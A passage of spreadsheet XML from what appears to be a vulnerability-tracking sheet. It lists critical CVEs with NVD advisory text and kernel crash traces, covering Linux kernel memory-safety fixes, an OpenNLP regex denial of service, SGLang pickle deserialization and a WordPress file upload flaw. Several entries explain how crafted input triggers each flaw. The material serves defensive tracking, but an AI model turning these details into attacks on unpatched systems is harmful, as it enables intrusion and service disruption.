  [    2.490927] Code: ff f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 80 3d ad 34 09 00 00 74 13 b8 2a 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 4c c3 0f 1f 00 55 48 89 e5 48 83 ec 10 89 55
  [    2.490929] RSP: 002b:00007ffd473b01a8 EFLAGS: 00000202 ORIG_RAX: 000000000000002a
  [    2.490935] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 0000000000421bb4
  [    2.490936] RDX: 0000000000000010 RSI: 00007ffd473b01d0 RDI: 0000000000000003
  [    2.490937] RBP: 0000000000003930 R08: 0000000000000004 R09: 0000000000000000
  [    2.490938] R10: 00007ffd473b0f98 R11: 0000000000000202 R12: 0000000000000006
  [    2.490939] R13: 00007ffd473b0f87 R14: 0000000000000003 R15: 00007ffd473b0f90
  [    2.490940]  &lt;/TASK&gt;
  [    2.490941]
  [    2.499545] Allocated by task 44:
  [    2.499693]  kasan_save_stack+0x33/0x60
  [    2.499860]  kasan_save_track+0x14/0x30
  [    2.500026]  __kasan_kmalloc+0x8f/0xa0
  [    2.500190]  __kmalloc_cache_noprof+0x158/0x370
  [    2.500393]  smc_llc_enqueue+0x72/0x560
  [    2.500559]  smc_wr_rx_tasklet_fn+0x474/0xa80
  [    2.500747]  tasklet_action_common+0x20f/0x8a0
  [    2.500945]  handle_softirqs+0x18e/0x590
  [    2.501115]  do_softirq+0x3b/0x60
  [    2.501266]  __local_bh_enable_ip+0x61/0x70
  [    2.501446]  __alloc_skb+0x732/0x890
  [    2.501604]  rxe_init_packet+0x16b/0x4f0
  [    2.501783]  prepare_ack_packet+0xb8/0x830
  [    2.501962]  rxe_receiver+0x495/0x96e0
  [    2.502125]  do_work+0x144/0x470
  [    2.502269]  process_one_work+0x633/0x1030
  [    2.502450]  worker_thread+0x45b/0xd10
  [    2.50261
---truncated---</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80986</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81002</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xdp: fix zero-copy frame layout
xdp_convert_zc_to_xdp_frame() clones an XSK packet into an order-0 page
and advertises PAGE_SIZE as its frame size.  It allows the copied frame
to occupy the page tail needed by skb_shared_info and records zero
headroom even when metadata separates the frame header from packet data.
An AF_XDP zero-copy packet redirected through cpumap can therefore make
the skb overlap skb_shared_info or place it beyond the allocated page.
Limit the copied layout to SKB_WITH_OVERHEAD(PAGE_SIZE) and include the
metadata length in frame headroom.  Redirect callers already handle a
NULL conversion result.
BUG: KASAN: slab-out-of-bounds in skb_gro_receive
Write of size 4 at addr ffff88800cf37004 by task cpumap/1/map:1/146
Call Trace:
 skb_gro_receive (net/core/gro.c:174)
 udp_gro_receive (net/ipv4/udp_offload.c:812)
 inet_gro_receive (net/ipv4/af_inet.c:1539)
 dev_gro_receive (net/core/gro.c:515)
 gro_receive_skb (net/core/gro.c:633)
 cpu_map_kthread_run (kernel/bpf/cpumap.c:395)
 kthread (kernel/kthread.c:436)
 ret_from_fork (arch/x86/kernel/process.c:164)
 ret_from_fork_asm (arch/x86/entry/entry_64.S:255)
Kernel panic - not syncing: KASAN: panic_on_warn set ...</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81002</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82617</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>The two built-in name-finder patterns exposed by
opennlp.tools.namefind.RegexNameFinderFactory - DEFAULT_REGEX_NAME_FINDER.EMAIL
and DEFAULT_REGEX_NAME_FINDER.URL - contain ambiguous nested quantifiers. An
application that obtains these finders through
RegexNameFinderFactory.getDefaultRegexNameFinders(...) and then applies them to
untrusted text through RegexNameFinder.find(String[]) or RegexNameFinder.find(String)
can be driven into super-linear backtracking or into unbounded matcher recursion by a
small crafted input.
For the EMAIL pattern, a long run of local-part characters that is never followed by an
@ forces the matcher to re-scan to end-of-input from every starting offset. Cost grows
quadratically with input length: an input of approximately 32 KB consumes several seconds
of CPU in a single find() call and returns no match, and each doubling of the input
multiplies the cost roughly four-fold.
For the URL pattern, the query-string sub-expression nests a capturing repetition inside
an outer repetition. The JDK matcher recurses once per query token, so an input of
approximately 4 KB containing many &amp;-separated tokens exhausts the thread stack and
causes java.lang.StackOverflowError to propagate out of find(), terminating the
calling thread. On a thread created with a smaller stack (for example -Xss512k, typical
of server worker pools) approximately 1 KB is sufficient.
In both cases an attacker who can supply text for analysis can convert a single request
into seconds to minutes of pinned CPU, or into an abrupt thread death, denying service to
the embedding application. No authentication, special configuration, or model file is
required beyond the application having selected one of the two built-in finders.
This issue affects Apache OpenNLP: from 2.0.0 through 2.5.11; from 3.0.0-M1 through
3.0.0-M5.
Users are recommended to upgrade to version 2.5.12, or to 3.0.0-M6 for users tracking the
3.0.0 milestone line, which fix the issue.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82617</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84390</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-540</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>A inclusion of sensitive information in source code vulnerability in Fortinet FortiMonitorOnSight 7.2.4 through 7.2.7, FortiMonitorOnSight 7.2.0 through 7.2.2 may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84390</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86793</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>SGLang allows unauthenticated pickle deserialization through /update_weights_from_tensor when no auth keys are configured, and the SafeUnpickler policy can be bypassed because builtins.import and builtins.getattr are resolvable, enabling code execution via pickle REDUCE.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86793</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8778</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>The MIPL Grouped Checkout Fields for WooCommerce – Customize &amp; Organize Checkout Fields. plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `mipl_wc_upload_file` function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8778</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89478</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: drop a chunk if its transport was removed
sctp_rcv() resolves the transport once per packet and leaves it in
chunk-&gt;transport. The lookup reference, or the one sctp_add_backlog() takes
if the socket is owned by userspace, keeps it around until the chunk has
been processed.
An authenticated ASCONF DEL-IP can remove it in the meantime.
sctp_assoc_rm_peer() takes the transport out of the association and calls
sctp_transport_free(), which tags it dead and drops the reference the
association held. There is a window on both paths: the packet can sit on
the socket backlog, and on the direct path the lookup completes before
bh_lock_sock().
The DATA chunk in that packet puts the removed transport back into
asoc-&gt;peer.last_data_from. Once the packet is done that reference goes
away and the transport is freed by RCU, so the next delayed SACK carries
the pointer into the SACK chunk and sctp_outq_select_transport() reads the
freed transport's state.
Drop the chunk in sctp_inq_push(), next to the existing rcvr-&gt;dead check.
Both paths reach it with the association's socket lock held. The peer
retransmits it.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89478</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89479</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: stop processing a packet once its association is deleted
sctp_endpoint_bh_rcv() looks the association up only when chunk-&gt;asoc is
NULL, and caches the result in chunk-&gt;asoc and chunk-&gt;transport without
taking a reference.
A packet that matches no association is handed to the endpoint, so a peer
can bundle COOKIE ECHO, SHUTDOWN and SHUTDOWN ACK in one packet. The
COOKIE ECHO creates the association, the SHUTDOWN chunk caches it, and
with the outqueue empty the SHUTDOWN ACK reaches sctp_sf_do_9_2_final(),
so the association and its transports are freed.
The endpoint loop has no counterpart to the asoc-&gt;base.dead check in
sctp_assoc_bh_rcv(). The next chunk writes to last_time_heard in the freed
transport and is then passed to sctp_do_sm() with the freed association.
The transport is freed through RCU, so this needs the packet to come off
the socket backlog, where the loop runs in task context.
The endpoint loop cannot do the same check: it holds no reference on the
association, so reading asoc-&gt;base.dead would itself be a use-after-free.
Mark the packet for discard in the command interpreter, just before it
deletes the association. That is also before sctp_inq_free() releases the
chunk on the association receive path.
sctp_sf_do_5_2_4_dupcook() issues SCTP_CMD_DELETE_TCB for the temporary
association, while the one the packet belongs to stays alive. A restarting
peer can bundle DATA behind its COOKIE ECHO, so compare against
chunk-&gt;asoc and leave that case alone.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89479</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89482</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: do not accept C2HData based on blk_rq_payload_bytes() alone
Commit 25e5cb780e62 ("nvme-tcp: fix possible crash in write_zeroes
processing") established that blk_rq_payload_bytes() must not be read
without first checking blk_rq_nr_phys_segments(), and recorded the
result in nvme_tcp_setup_cmd_pdu() as req-&gt;data_len. The receive side
was left as it was.
The two differ for REQ_OP_WRITE_ZEROES, which has no physical segments
but a non-zero blk_rq_bytes(), so setup leaves req-&gt;iter untouched
while the receive gate lets a C2HData through and nvme_tcp_recv_data()
copies into whatever the previous command on that tag left there. The
driver-private area is zeroed only when the tag set is allocated.
Reproduced with a test target that leaves a residual iterator on a tag
and then sends a C2HData for a WRITE_ZEROES command on the same tag:
BUG: KASAN: wild-memory-access in _copy_to_iter+0x642/0x1330
Write of size 512 at addr ffe728c2175dfa81 by task kworker/0:1H/103
CPU: 0 UID: 0 PID: 103 Comm: kworker/0:1H Not tainted 7.2.0-rc5-NVMETCP-gf5098b6bae76 #1 PREEMPT(lazy)
Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
Workqueue: nvme_tcp_wq nvme_tcp_io_work
Call Trace:
 &lt;TASK&gt;
 dump_stack_lvl+0x53/0x70
 kasan_report+0xce/0x100
 ? _copy_to_iter+0x642/0x1330
 kasan_check_range+0x105/0x1b0
 __asan_memcpy+0x3c/0x60
 _copy_to_iter+0x642/0x1330
 ? __pfx_sock_has_perm+0x10/0x10
 ? worker_thread+0x45b/0xd10
 ? __pfx__copy_to_iter+0x10/0x10
 ? _raw_spin_lock_bh+0x83/0xe0
 ? __pfx__raw_spin_lock_bh+0x10/0x10
 __skb_datagram_iter+0xf3/0x820
 ? __pfx_simple_copy_to_iter+0x10/0x10
 ? __asan_memcpy+0x3c/0x60
 ? skb_copy_bits+0x58d/0x830
 skb_copy_datagram_iter+0x37/0x120
 nvme_tcp_recv_skb+0xa07/0x4320
 ? __pfx_nvme_tcp_recv_skb+0x10/0x10
 __tcp_read_sock+0x1ab/0x810
 ? __pfx_nvme_tcp_recv_skb+0x10/0x10
 ? __pfx_lock_sock_nested+0x10/0x10
 ? __pfx___tcp_read_sock+0x10/0x10
 nvme_tcp_try_recv+0x152/0x1e0
 ? __pfx_nvme_tcp_try_recv+0x10/0x10
 ? __pfx_mutex_unlock+0x10/0x10
 nvme_tcp_io_work+0x1e4/0x6c0
 ? __schedule+0x181a/0x49f0
 ? __pfx_nvme_tcp_io_work+0x10/0x10
 process_one_work+0x633/0x1030
Keep the blk_rq_payload_bytes() test and add req-&gt;data_len to it. The
old test is what rejects a C2HData naming a tag that is no longer in
flight, because blk_update_request() zeroes rq-&gt;__data_len on
completion; req-&gt;data_len and req-&gt;curr_bio are driver-private and
survive completion, so they cannot stand in for it. Setup initialises
the iterator only when both req-&gt;curr_bio and req-&gt;data_len are set, so
the gate now tests the same two.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89482</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89485</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lockd: pin next file across nlm_inspect_file lock-drop
nlm_traverse_files() pins the current file with f_count++ across
a mutex_unlock for nlm_inspect_file(), but nothing pins the saved
next pointer.  A concurrent nlm_release_file() can kfree the next
file during the unlock window, and the iterator dereferences freed
memory on the next loop step.
Pin both current and next before the lock-drop.  Advance by
swapping the pinned cursors at the end of each iteration so next
is always held alive across the unlock.
Always call nlm_file_release() after dropping the iteration pin,
regardless of whether the file matched the predicate.  Use
nlm_file_inuse(), which does a live walk of the inode lock list,
rather than the cached f_locks field, so skipped files that never
ran nlm_inspect_file() are evaluated correctly.
Because every file in a hash bucket is now pinned and released,
files skipped by the is_failover_file predicate that have no
locks, blocks, shares, or external references are deleted during
traversal.  The old code never evaluated skipped files for
cleanup.  The new behavior is intentional: such files are stale
and should not persist in the table.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89485</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89492</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate directory-index entry counts when reading metadata
ocfs2_validate_dx_leaf() and ocfs2_validate_dx_root() check the ECC and
signature of an indexed-directory block before it reaches higher-level
callers, but neither validator bounds the ocfs2_dx_entry_list counts
against the capacity of the block that holds them.
ocfs2_dx_dir_search() then walks
	for (i = 0; i &lt; le16_to_cpu(entry_list-&gt;de_num_used); i++)
		dx_entry = &amp;entry_list-&gt;de_entries[i];
over de_num_used entries with no bounds check.  entry_list is either
dx_leaf-&gt;dl_list (from ocfs2_read_dx_leaf) or, for an inline root,
dx_root-&gt;dr_entries.  A crafted on-disk image can set de_num_used (and
de_count, which is the __counted_by_le() bound of de_entries) to 0xffff
and make the walk read far past the end of the 4KB metadata block, giving
a slab out-of-bounds read reachable from any path lookup, stat() or open()
on an indexed directory once the image is mounted.
Commit 775c17386a6f ("ocfs2: validate dx_root extent list fields during
block read") already bounds dr_list for the non-inline dx_root, but left
the inline dr_entries path and the dx_leaf dl_list unchecked.  Add the
same read-time validation for both entry lists: de_count must equal the
capacity of the block (ocfs2_dx_entries_per_leaf()/per_root()) and
de_num_used must not exceed de_count, rejecting corrupted metadata with
-EFSCORRUPTED before ocfs2_dx_dir_search() can walk an out-of-range entry
array.
de_count is always written as exactly the block capacity when a leaf or
inline root is formatted, so the equality check does not reject any valid
image.
Found by 0sec automated security-research tooling (https://0sec.ai).</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89492</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89494</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate lengths in dlm_mig_lockres_handler
A node receiving a DLM_MIG_LOCKRES message trusts several fields of the
peer-supplied dlm_migratable_lockres without validation.  num_locks and
lockname_len are bounded only on the sending side, and the message is
never checked to actually carry num_locks migratable_lock entries.  As a
result dlm_process_recovery_data() walks mres-&gt;ml[0..num_locks) past the
kmalloc(data_len) copy of the message (an out-of-bounds read that ends in
a BUG_ON panic), and dlm_init_lockres() copies lockname_len bytes into the
fixed 32-byte o2dlm_lockname slab object (a heap out-of-bounds write). 
Both are reachable by any node in the domain.
